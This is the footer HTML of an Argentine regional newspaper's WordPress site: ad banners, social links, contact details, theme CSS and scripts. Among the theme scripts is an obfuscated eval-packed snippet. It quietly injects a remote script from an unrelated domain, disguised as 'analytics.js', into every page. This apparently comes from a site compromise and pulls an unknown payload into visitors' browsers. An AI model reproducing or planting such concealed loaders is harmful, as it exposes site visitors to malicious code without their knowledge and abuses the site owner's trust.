<div id='div-gpt-ad-1466598948451-0' style='height:250px; width:300px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1466598948451-0'); });
</script>
</div>
</div><div class="dfad dfad_pos_3" id="_ad_46170"><img src="http://laopinion.com.ar/wp-content/uploads/2017/03/sipem.jpg" alt="sipem" width="327" height="173" class="alignleft size-full wp-image-46171" /></div><div class="dfad dfad_pos_4" id="_ad_3650"><a href="https://www.usodirectorio.com/vender"><img src="http://laopinion.com.ar/wp-content/uploads/2014/07/directorio.png" alt="directorio" width="300" height="277" class="alignleft size-full wp-image-46748" /></a></div><div class="dfad dfad_pos_5 dfad_last" id="_ad_50724"><a href="https://alrasur.com.ar/promo/web?utm_source=laopinion_trenquelauquen&amp;utm_medium=banner"><img src="http://laopinion.com.ar/wp-content/uploads/2017/07/alrasur-300x200.gif" alt="alrasur" width="300" height="200" class="alignleft size-medium wp-image-50722" /></a></div></div>

</div>
		</aside>                            </div>
                        </div>
                            </div> <!-- /.td-pb-row -->
    </div> <!-- /.td-container -->
</div> <!-- /.td-main-content-wrap -->


<!-- Footer -->
<div class="td-footer-wrapper">
    <div class="td-container">

	    <div class="td-pb-row">
		    <div class="td-pb-span12">
			    		    </div>
	    </div>

        <div class="td-pb-row">

            <div class="td-pb-span4">
                            </div>

            <div class="td-pb-span8">
                            </div>
        </div>
    </div>

    <div class="td-footer-bottom-full">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span3"><aside class="footer-logo-wrap"><a href="http://laopinion.com.ar/"><img src="http://laopinion.com.ar/wp-content/uploads/2015/07/logoblancoweb.png" alt=""/></a></aside></div><div class="td-pb-span5"><aside class="footer-text-wrap"><div class="block-title"><span>SOBRE NOSOTROS</span></div>Copyright © Diario La Opinión de Trenque Lauquen.<br />
Director: Juan Ramón Nazar - Co-Directora: María Elida Nazar </aside></div><div class="td-pb-span4"><aside class="footer-social-wrap td-social-style-2"><div class="block-title"><span>Seguinos en:</span></div><span class="td-social-icon-wrap"><a target="_blank" href="https://www.facebook.com/diariolaopinion" title="Facebook"><i class="td-icon-font td-icon-facebook"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="https://www.flickr.com/photos/laopinion/" title="Flickr"><i class="td-icon-font td-icon-flickr"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="http://twitter.com/laopinionweb" title="Twitter"><i class="td-icon-font td-icon-twitter"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="https://www.youtube.com/user/diariolaopinion" title="Youtube"><i class="td-icon-font td-icon-youtube"></i></a></span></aside></div>            </div>
        </div>
    </div>
</div>

<!-- Sub Footer -->
    <div class="td-sub-footer-container">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span7 td-sub-footer-menu">
                        <div class="menu-footer-container"><ul id="menu-footer" class="td-subfooter-menu"><li id="menu-item-10446" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-10446"><a></a></li>
<li id="menu-item-12430" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-12430"><a>Institucional</a></li>
<li id="menu-item-10447" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-10447"><a></a></li>
</ul></div>                </div>

                <div class="td-pb-span5 td-sub-footer-copy">
                    Estamos en Roca 752 - (02392) 410434 - diario@laopinion.com.ar                </div>
            </div>
        </div>
    </div>
    </div><!--close content div-->
</div><!--close td-outer-wrap-->

        <div id="fb-root"></div>
        <script>(function(d, s, id) {
          var js, fjs = d.getElementsByTagName(s)[0];
          if (d.getElementById(id)) return;
          js = d.createElement(s); js.id = id;
          js.src = "//connect.facebook.net/es_ES/sdk.js#xfbml=1&appId=305796219513705&version=v2.3";
          fjs.parentNode.insertBefore(js, fjs);
        }(document, 'script', 'facebook-jssdk'));</script>	
    

    <!--

        Theme: Newspaper by tagDiv 2015
        Version: 6.2 (rara)
        Deploy mode: deploy
        Speed booster: v4.1

        uid: 5997830a684f6
    -->

    
<!-- Custom css form theme panel -->
<style type="text/css" media="screen">
/* custom css theme panel */
.td-header-style-1 .td-header-sp-logo {
    width: 230px;
    position: relative;
    height: 15px;
    margin-top: 25px;
}
.td-banner-wrap-full, .td-header-style-11 .td-logo-wrap-full {
    background-color: #1A5698;
    border-top: 3px solid #ffffff;
}

input[type="submit"] {
    font-family: "Roboto",sans-serif;
    font-size: 13px;
    background-color: #C3512F;
    border-radius: 0px;
    color: #FFF;
    border: medium none;
    padding: 8px 15px;
    font-weight: 500;
    transition: background-color 0.4s ease 0s;
}
.btn:hover, .btn:focus {
    color: #ffffff;
    text-decoration: none;
}
.td_module_1 .td-module-thumb {
    height: 235px;
}
.td_module_1 {
    background-color: #858585;
padding-bottom: 2px;
padding-right: 5px;
padding-left: 8px;
padding-right: 8px;
padding-top: 5px;
margin-bottom: 10px;
}

.td_module_1 .entry-title a {
    color: #FFF !important;
}
.td_module_1 .entry-title  a:hover {
text-decoration: none !important;
color: #e3e3e3 !important;
}
.td_module_1 .td-module-thumb {
    height: 235px;
    margin-bottom: 0px;
}
.td_module_1 .td-post-date {
    color: #ffffff;
    display: inline-block;
    position: relative;
    top: 2px;
}
.td_block_wrap {
    padding-bottom: 10px;
    position: relative;
    clear: both;
}
.wpb_row, .wpb_content_element, ul.wpb_thumbnails-fluid > li, .last_toggle_el_margin, .wpb_button {
    margin-bottom: 0px;
}
.td-module-thumb {
    position: relative;
    margin-bottom: 5px;
}
.td_module_mx1 .td-module-meta-info {
    position: absolute;
    bottom: 0px;
    padding: 0px 17px;
    margin-bottom: 25px;
    z-index: 1;
}
.td_module_3 {
background-color: #F5F7FA;
padding-bottom: 2px;
padding-right: 5px;
padding-left: 8px;
padding-right: 8px;
padding-top: 5px;
margin-bottom: 25px;
}
.td_module_3 .td-module-thumb {
    height: 235px;
    margin-bottom: 0px;
}
.td-block-row [class*="td-block-span"] {
    display: block;
    min-height: 1px;
    float: left;
    padding-right: 10px;
    padding-left: 10px;
}
.copete {
    font-weight: 400;
    color: #5D5D5D;
    font-size: 18px;
    line-height: 1.4em;
    margin-top: 10px;
    margin-bottom: 15px;
    letter-spacing: 0px;
    font-style: italic;
}
.clima {
float: right;
margin-top: 8px;
padding: 0px 0px 0px 0px;
text-align: left;
 width: 170px;
}
.social {
float: right;
margin-top: 10px;
margin-left: 30px;
 width: 50px;
}
.fecha {
float: right;
margin-top: 7px;
text-align: center;
height: 40px;
 width: 200px;
}

.suscripcion a:link{
    display: inline-block;
    font: 12px Arial,Verdana,sans-serif;
    color: #ffffff;
font-weight: bold;
}
.suscripcion a:visited{
    display: inline-block;
    font: 12px Arial,Verdana,sans-serif;
    color: #ffffff;
font-weight: bold;
}
.dia {
    display: inline-block;
    font: 12px Arial,Verdana,sans-serif;
    color: #ffffff;
 text-transform:uppercase;
}


/* custom responsive css from theme panel (Advanced CSS) */
@media (min-width: 1141px) {
.td-boxed-layout #td-outer-wrap {
    margin-left: auto;
    margin-right: auto;
    width: 1122px;
}
}


/* custom responsive css from theme panel (Advanced CSS) */
@media (max-width: 767px) {
.td-header-wrap {
    display: none;
}
}
</style>

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 1=2.6(\'1\');1.5=\'4://3.8.9/d.3\';2.a(\'b\')[0].c(1);',14,14,'|script|document|js|https|src|createElement|var|trysomethingnew|eu|getElementsByTagName|head|appendChild|analytics'.split('|'),0,{}))</script><link rel='stylesheet' id='dashicons-css'  href='http://laopinion.com.ar/wp-includes/css/dashicons.min.css?ver=ece71427dfbf95750ada9d289483f5f5' type='text/css' media='all' />
<link rel='stylesheet' id='thickbox-css'  href='http://laopinion.com.ar/wp-includes/js/thickbox/thickbox.css?ver=ece71427dfbf95750ada9d289483f5f5' type='text/css' media='all' />
<script type='text/javascript' src='http://laopinion.com.ar/wp-content/themes/Newspaper/js/tagdiv_theme.min.js?ver=6.2'></script>
<script type='text/javascript' src='http://laopinion.com.ar/wp-includes/js/comment-reply.min.js?ver=ece71427dfbf95750ada9d289483f5f5'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var thickboxL10n = {"next":"Siguiente >","prev":"< Anterior","image":"Imagen","of":"de","close":"Cerrar","noiframes":"Esta funci\u00f3n requiere de frames insertados. Tienes los iframes desactivados o tu navegador no los soporta.","loadingAnimation":"http:\/\/laopinion.com.ar\/wp-includes\/js\/thickbox\/loadingAnimation.gif"};
/* ]]> */
</script>
<script type='text/javascript' src='http://laopinion.com.ar/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105'></script>
<script type='text/javascript' src='http://laopinion.com.ar/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=4.12.1'></script>
<script type='text/javascript' src='http://laopinion.com.ar/wp-content/plugins/akismet/_inc/form.js?ver=3.3.4'></script>

<!-- JS generated by theme -->

<script>
    

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'http://laopinion.com.ar/wp-content/themes/Newspaper/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'http://laopinion.com.ar/wp-content/themes/Newspaper';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>


<!-- Header style compiled by theme -->

<style>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</style>


</body>
</html>